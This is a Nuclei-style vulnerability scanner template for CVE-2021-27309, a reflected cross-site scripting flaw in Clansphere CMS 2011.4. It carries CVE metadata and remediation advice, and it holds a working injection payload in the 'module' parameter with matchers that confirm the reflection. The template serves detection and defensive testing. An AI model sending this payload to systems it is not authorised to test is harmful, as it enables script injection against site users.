id: CVE-2021-27309

info:
  name: Clansphere CMS 2011.4 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: |
    Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "module" parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Clansphere CMS or apply the vendor-supplied patch to fix the XSS vulnerability.
  reference:
    - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27309
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-27309
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.42925
    cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: csphere
    product: clansphere
  tags: cve2021,cve,clansphere,xss,cms,unauth,csphere

http:
  - method: GET
    path:
      - "{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script>.php'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205b00fbd835bf6365747ca455e3baf330c2bf123afee61ae0f8981aa1dab11857022100ef6c2c713eaa742043860a3f65409516d36de9988dd7053879e71c4db8f4a572:922c64590222798bb761d5b6d8e72950